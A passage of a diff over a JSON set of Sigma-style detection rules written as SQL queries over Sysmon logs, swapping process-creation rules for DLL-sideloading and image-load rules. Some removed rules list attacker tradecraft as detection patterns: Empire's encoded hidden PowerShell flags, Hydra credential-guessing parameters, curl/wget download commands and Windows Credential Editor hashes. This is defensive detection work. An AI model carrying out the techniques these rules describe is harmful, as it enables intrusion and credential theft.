Libraries", + "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "status": "test", + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1220" ], "falsepositives": [ - "Administrative activity" + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" }, { - "title": "Suspicious Msiexec Quiet Install", - "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "title": "Potential DLL Sideloading Via JsSchHlp", + "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_quiet.yml" + "filename": "image_load_side_load_jsschhlp.yml" }, { - "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", - "id": "01c42d3c-242d-4655-85b2-34f1739632f7", - "status": "experimental", - "description": "Detects usage of Dsacls to grant over permissive permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "status": "test", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" ], "falsepositives": [ - "Legitimate administrators granting over permissive permissions to users" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Permission Check Via Accesschk.EXE", - "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", - "status": "test", - "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "status": "experimental", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative activity" + "Other DLLs with the same Imphash" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" ], - "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "UIPromptForCredentials DLLs", + "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "status": "experimental", + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Unknown" + "Other legitimate processes loading those DLLs in your environment." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_uipromptforcreds_dlls.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", + "status": "experimental", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "Perl Inline Command Execution", - "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "title": "Web Browsers DLL Sideloading", + "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "status": "experimental", - "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_perl_inline_command_execution.yml" + "filename": "image_load_side_load_web_browsers.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory Kerberos DLL Loaded Via Office Application", + "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "status": "test", + "description": "Detects Kerberos DLL being loaded by an Office Product", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "filename": "image_load_office_kerberos_dll_load.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Core DLL Loaded By Non PowerShell Process", + "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "status": "experimental", + "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.t1059.001", + "attack.execution" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR Image LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR Image LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_dll_system_management_automation_susp_load.yml" }, { - "title": "Gpscript Execution", - "id": "1e59c230-6670-45bf-83b0-98903780607e", + "title": "Potential Wazuh Security Platform DLL Sideloading", + "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "status": "experimental", - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "author": "frack113", + "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate uses of logon scripts distributed via group policy" + "Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_gpscript.yml" + "filename": "image_load_side_load_wazuh.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "title": "VBA DLL 